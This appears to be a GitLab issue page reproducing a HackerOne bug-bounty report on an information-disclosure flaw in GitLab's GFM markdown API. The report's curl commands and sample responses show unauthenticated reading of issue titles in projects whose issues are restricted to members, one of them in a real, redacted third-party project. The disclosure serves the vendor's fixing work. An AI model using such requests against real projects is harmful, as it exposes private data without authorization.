Skip to content

GFM markdown API discloses issue titles of limited projects

HackerOne report #1450306 by shells3c on 2022-01-15, assigned to @nmalcolm:

Report | How To Reproduce

Report

Summary

GFM markdown API allows unauthenticated users to read issue titles of projects that have permission for issues set to Only Project Members

Steps to reproduce
  1. Create a project, set Issues visibility to Only Project Members
  2. Create an issue
  3. Execute this command (replace [user]/[project] with your project namespace):
curl -H 'Content-Type: application/json' -d '{"project":"[username]/[project]","text":"See #1","gfm":true}' 'https://gitlab.com/api/v4/markdown'  
  1. The response will disclose the title of issue #1 (attribute title):
{"html":"\u003cp data-sourcepos=\"1:1-1:6\" dir=\"auto\"\u003eSee \u003ca href=\"https://gitlab.com/[user]/[project]/-/issues/1\" data-original=\"#1\" data-link=\"false\" data-link-reference=\"false\" data-project=\"[Project ID]\" data-issue=\"[Issue ID]\" data-reference-type=\"issue\" data-container=\"body\" data-placement=\"top\" title=\"This is a private issue\" class=\"gfm gfm-issue has-tooltip\"\u003e#1\u003c/a\u003e\u003c/p\u003e"}  
Examples

Visit: https://gitlab.com/[REDACTED]/alertmanager/-/issues and you can see that the visibility is restricted. Now execute this command:

curl -H 'Content-Type: application/json' -d '{"project":"[REDACTED]/alertmanager","text":"See #7","gfm":true}' 'https://gitlab.com/api/v4/markdown'  

Response:

{"html":"\u003cp data-sourcepos=\"1:1-1:6\" dir=\"auto\"\u003eSee \u003ca href=\"https://gitlab.com/[REDACTED]/alertmanager/-/issues/7\" data-original=\"#7\" data-link=\"false\" data-link-reference=\"false\" data-project=\"25681831\" data-issue=\"100690987\" data-reference-type=\"issue\" data-container=\"body\" data-placement=\"top\" title=\"Internal\" class=\"gfm gfm-issue has-tooltip\"\u003e#7\u003c/a\u003e\u003c/p\u003e"}  

As you can see, the title of issue #7 is Internal, you can check other issues if you want

Output of checks

This bug happens on GitLab.com

Impact

Accessing all issue titles of projects have visibility of issues is Only Project Members

How To Reproduce

Please add reproducibility information to this section:

Edited by Costel Maxim